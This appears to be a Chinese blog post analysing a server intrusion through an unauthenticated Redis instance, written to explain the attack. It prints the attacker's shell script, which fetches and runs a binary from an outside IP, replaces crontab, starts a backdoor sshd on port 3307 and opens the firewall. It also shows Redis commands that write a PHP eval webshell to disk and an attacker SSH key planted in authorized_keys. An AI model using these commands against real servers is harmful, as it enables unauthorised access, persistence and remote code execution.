入侵事件

1、/etc/crontab文件被修改:
REDIS0006þ^@^@^Gcrackit@T


SHELL=/bin/sh
#* * * * * root wget -P /tmp http://104.223.72.167:8080/shell.sh



ÿÉ6<95>GþÊN<8c>

2、shell.sh文件:
rm -rf shell.sh
wget -P /tmp http://104.223.72.167:8080/rebot
chmod 777 /bin/rebot
nohup bin/rebot > /tmp/bin/rebot.file 2>&1
rm -rf /etc/crontab
wget -P /etc http://104.223.72.167:8080/crontab
ln -sf /usr/stmp/sshd /tmp/su;/tmp/su -oPort=3307
iptables -I INPUT -p tcp --dport 3307 -i ACCEPT
/etc/rc.d/init.d/iptables save

入侵分析:
首先扫描端口,发现redis的默认服务端口6379,由于某些暴露在外面的redis没有设置密码,这样就可以直接登录。
1.修改crontab文档,这里建立一个tmp下的文档,
CONFIG SET dir /tmp/
CONFIG set dbfilename test.php
SET fuck "<?php @eval($_POST[123]);?>"
save
然后,去tmp目录查看,
ls /tmp/
dump.rdb  hist  hsperfdata_ngx  hsperfdata_root  log  test.php
发现已经生成,打开查看:
REDIS0006þ^@^@^Dfuck^[<?php @eval($_POST[123]);?>ÿ^WÙY©A
p^W

和原来的crontab文档进行对比,发现都有相同的头部:REDIS0006þ^@^@^D
2.crontab定时运行,下载shell文档到tmp下面


还有一个地方需要注意:
root目录下的.ssh/authorized_keys
  打开发现:
     REDIS0006þ^@^@^Gcrackit^G






^@^CqweA<9f>

ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAm8glBB05kyIgRXCs8WuRwV5zLVU0LjzL1eFl70hIj0/raIl1RxCMrm6u7+fLjxEgoaCiuoNrL+gb+9Z6uBPhIdF3Q61WLuNB/nQ83S3o3d6gW9urkYU3/jKO1y7RZ+E/3u5GNrFsdMl4xaLatjcj7KSU6WJo4c90OSu0RhzZLS2jWKOLiWF3JSwoKTXouAfcDebhyt97D/HF/mZsIIG9wZVVZVoqFpm/RSZvsYvDdICy8hk3osVXW5rSw0vpB9uWBSQBfiJ5/eKZBeKSkJE8s3T75/NFrrr0n6A3h7fODsjUTIOYjOcFqAyrzdBG59eo441MaqB4nThGk+007IACZw== root@dedi10243.hostsailor.com


ÿÛ6·3ëTDß



又是典型的redis文件的格式!
在ssh的目录下面还发现了其它遗留的文件:


在/etc/ssh下也有相关的文档:
authorized_keys  ssh_config   ssh_host_dsa_key      ssh_host_key      ssh_host_rsa_key
moduli           sshd_config  ssh_host_dsa_key.pub  ssh_host_key.pub  ssh_host_rsa_key.pub
vi authorized_keys
发现:
REDIS0006þ^@^@^S1601251638050293014


  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值